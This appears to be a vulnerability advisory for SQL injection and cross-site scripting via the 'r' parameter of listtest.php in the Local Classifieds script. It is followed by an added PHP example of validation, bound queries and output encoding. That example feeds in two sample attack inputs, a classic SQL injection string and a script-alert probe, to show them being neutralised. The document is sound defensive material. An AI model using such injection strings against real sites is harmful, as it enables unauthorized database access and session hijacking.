vendor: Local Classifieds
by: TR-ShaRk
CVSS: 7.5 (HIGH)
SQL Injection and XSS
CWE: 89, 79
Product Name: Local Classifieds
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
Local Classifieds Turnkeyforms
The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'r' parameter to the 'listtest.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, and to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.
Mitigation:
Input validation should be used to prevent the exploitation of this vulnerability.
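
The following is an added example, not code from the vendor or from the original advisory, showing how a parameter such as 'r' can be validated, bound into the query, and encoded on output. It assumes 'r' is a numeric region id; the `listings` table, its columns, and the function names are hypothetical, and the data is constructed in an in-memory SQLite database.

```php
<?php
// Added example: hardened handling of a request parameter like 'r'.
// Assumptions (not from the advisory): 'r' is a numeric region id; the
// 'listings' table and its columns are hypothetical.

function find_listings(PDO $db, string $r): array
{
    // 1. Validate: accept only 1-9 decimal digits, reject everything else.
    if (!preg_match('/\A[0-9]{1,9}\z/', $r)) {
        return [];
    }
    // 2. Parameterize: the value is bound, never concatenated into SQL (CWE-89).
    $stmt = $db->prepare('SELECT title FROM listings WHERE region_id = :r');
    $stmt->bindValue(':r', (int) $r, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

function render_listings(string $r, array $titles): string
{
    // 3. Encode on output: both the echoed parameter and stored data (CWE-79).
    $esc = fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    $html = '<h1>Region ' . $esc($r) . '</h1><ul>';
    foreach ($titles as $t) {
        $html .= '<li>' . $esc($t) . '</li>';
    }
    return $html . '</ul>';
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE listings (region_id INTEGER, title TEXT)');
$db->exec("INSERT INTO listings VALUES (1, 'Bike <b>for sale</b>'), (2, 'Sofa')");

// Constructed inputs: one well-formed value, two malformed ones.
foreach (['1', "1' OR '1'='1", '<script>alert(1)</script>'] as $r) {
    echo render_listings($r, find_listings($db, $r)), "\n";
}
```

Validation alone does not cover the XSS half of the issue: stored listing titles are also encoded at render time, so markup that reached the database by another route is displayed as text.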